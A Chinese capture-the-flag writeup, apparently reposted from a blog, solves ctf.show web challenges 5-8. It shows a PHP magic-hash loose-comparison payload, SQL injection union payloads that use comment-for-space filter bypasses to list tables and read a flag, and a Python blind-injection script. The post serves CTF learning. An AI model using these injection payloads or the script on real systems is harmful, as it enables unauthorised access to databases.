ctf.show web 5-8 writeup

其他 2021-04-05 12:23:52 阅读次数: 0

ctf.show web 5-8 writeup

目录

web5

题目：

解题过程

ctf.show_web5
where is flag?
<?php
error_reporting(0);
    
?>
<html lang="zh-CN">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1.0" />
    <title>ctf.show_web5</title>
</head>
<body>
    <center>
    <h2>ctf.show_web5</h2>
    <hr>
    <h3>
    </center>
    <?php
        $flag="";
        $v1=$_GET['v1'];
        $v2=$_GET['v2'];
        if(isset($v1) && isset($v2)){
            if(!ctype_alpha($v1)){
                die("v1 error");
            }
            if(!is_numeric($v2)){
                die("v2 error");
            }
            if(md5($v1)==md5($v2)){
                echo $flag;
            }
        }else{
        
            echo "where is flag?";
        }
    ?>

</body>
</html>

相关资料：

ctype_alpha ( string $text ) : bool

做纯字符检测如果在当前语言环境中 text 里的每个字符都是一个字母，那么就返回true，反之则返回false。
is_numeric() 函数

用于检测变量是否为数字或数字字符串。如果指定的变量是数字和数字字符串则返回 TRUE，否则返回 FALSE。

同时php弱类型比较，当比较的双方类型不相同时，会先转化成相同的再进行比较，如果转化之后都是以0e为开头的字符串，则==成立。

payload:

?v1=QNKCDZO&v2=240610708

web6

题目：

解题过程

打开题目后，如下

类似于之前的web2，但是试了试发现有过滤

fuzz一下，空格被过滤掉了

可以用/**/代替空格进行绕过，接下来的步骤就是经典老番

注入点

username=admin'/**/or/**/1=1#&password=1

回显点为2，字段数为3

username=admin'/**/union/**/select/**/1,2,3#&password=1

爆库名

username=admin'/**/union/**/select/**/1,database(),3#&password=1

爆表名

username=admin'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1

爆字段名

username=admin'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#&password=1

爆字段值

username=admin'/**/union/**/select/**/1,group_concat(0x7e,flag,0x7e),3/**/from/**/flag#&password=1

web7

题目：

解题过程

打开题目

查看url三篇文章分别对应?id=1 2 3 ，之前做过类似的题目也是sql注入

这次吸取了上次的教训，先fuzz一下，还是过滤掉了空格，同样还是/**/代替空格进行绕过，同时注意这次试get传值，不是post传值

查字段数和回显点

?id=121'/**/union/**/select/**/1,2,3#

可以判断字段数为3，回显点为3

爆库名

?id=121'/**/union/**/select/**/1,2,database()#

爆表名

?id=121'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()#

爆字段名

?id=121'/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'#

这......没爆出字段名........,啊这，当时以为在其他表里，结果都试了一遍还是没有........，没有回显（懂的大佬请教教我）

爆字段值

但是可以盲猜一波，做的时候因为之前的字段名都是flag，所以我还是猜字段名为flag.。。结果成功了。。。

?id=121'/**/union/**/select/**/1,group_concat(0x7e,flag,0x7e),3/**/from/**/flag#

web8

题目：

解题过程

打开题目后，如下，还和之前的题目类似

有了之前的经验，先fuzz一下，本题过滤的比较多，过滤了union, select,',,(逗号),and,空格等等

联合查询用不了，可以试试用脚本跑，参考师傅们的wp，发现上个题目也是可以用py跑出来的

下面是找的师傅们的wp，我修改了一点点，原文传送门

下面的代码分别进行注释，即可分别得到表名，字段名，字段值。

import requests
s=requests.session()
url='http://afa20ae4-5e7d-4ace-81a5-a78dea7c2f3e.chall.ctf.show:8080/index.php'
table=""

for i in range(1,46):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        #payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'There was one clear' in ra:
            table += chr(j)
            print(table)
            break

总结：学到了一些绕过姿势，/**/代替空格等等，但是py脚本跑盲注题目还是不太熟练，还要多多实践。

猜你喜欢

转载自blog.csdn.net/RABCDXB/article/details/113829734

ctf.show web 5-8 writeup

ctf.show web 13-14 writeup

ctf.show web 9-12 writeup

ctf.show web 1-4 writeup

SWPU CTF 2017 Web WriteUp

南邮CTF - WEB——Writeup

ctf题目writeup（8）

ctf题目writeup（5）

CTF show WEB5

Bugku CTF Web(1-16) writeup

Bugku CTF Web(17-) Writeup

南邮ctf-web的writeup

BUGKU_CTF WEB 20题writeup

N1CTF WEB WriteUp

CTF show WEB7-8

[CTF刷题篇]CTFHub之Web前置技能HTTP协议Writeup(5/5)

Bugku writeup（web篇）5【$_POST】

Web-2(5-8)-BUUCTF平台

Bugku_CTF Writeup 之 web基础$_GET（30）

Bugku_CTF Writeup 之 web2（20）

Bugku_CTF Writeup 之 web3(30)

BUGKU_CTF WEB(10-19)writeUP

BUGKU_CTF WEB(1-10)writeUP

BUGKU_CTF WEB(21-35) writeUP

1010.CTF 题目之 WEB Writeup 通关大全 – 4

1009.CTF 题目之 WEB Writeup 通关大全 – 3

1007.CTF 题目之 WEB Writeup 通关大全 – 1

1008.CTF 题目之 WEB Writeup 通关大全 – 2

攻防世界（Ctf-Web 新手练习区 Writeup）

实战：2019 0ctf final Web Writeup（一）

今日推荐

周排行

LRU cache算法

windows10, 自带的OpenSSH, key权限问题, 文件权限问题

测试用例书写方法

HIVE-默认分隔符的（linux系统的特殊字符）查看，输入和修改

最贵的AMD 7nm显卡来了！这设计够狂野

java多线程简单demo

[ 转载 ]在Android系统上使用busybox——最简单的方法

QT connect学习

BFSIFT算法分析

Xcode10：library not found for -lstdc++.6.0.9 临时解决

每日归档

更多

2024-08-06(0)

2024-08-05(0)

2024-08-04(0)

2024-08-03(0)

2024-08-02(0)

2024-08-01(0)

2024-07-31(0)

2024-07-30(0)

2024-07-29(0)

2024-07-28(0)